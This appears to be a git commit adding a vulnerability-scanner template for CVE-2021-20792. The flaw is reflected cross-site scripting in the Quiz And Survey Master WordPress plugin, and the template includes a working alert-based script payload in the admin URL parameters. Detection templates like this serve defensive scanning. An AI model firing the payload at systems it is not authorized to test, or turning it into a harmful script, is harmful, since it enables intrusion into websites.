Create CVE-2021-20792.yaml

2021-09-29 04:05:15 +05:30 · 2021-09-29 04:05:15 +05:30 · ecc9f6935a
parent 631580be25
commit ecc9f6935a
1 changed files with 30 additions and 0 deletions
--- a/cves/2021/CVE-2021-20792.yaml
+++ b/cves/2021/CVE-2021-20792.yaml
@ -0,0 +1,30 @@
+id: CVE-2021-20792
+
+info:
+  name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  reference:
+    - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
+  tags: wordpress,cve,cve2021,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-admin/admin.php?page=mlw_quiz_list&s="><script>alert(document.domain)</script>&paged="><script>alert(/XSS-paged/)</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<script>alert(document.domain)</script>'
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "text/html"
+        part: header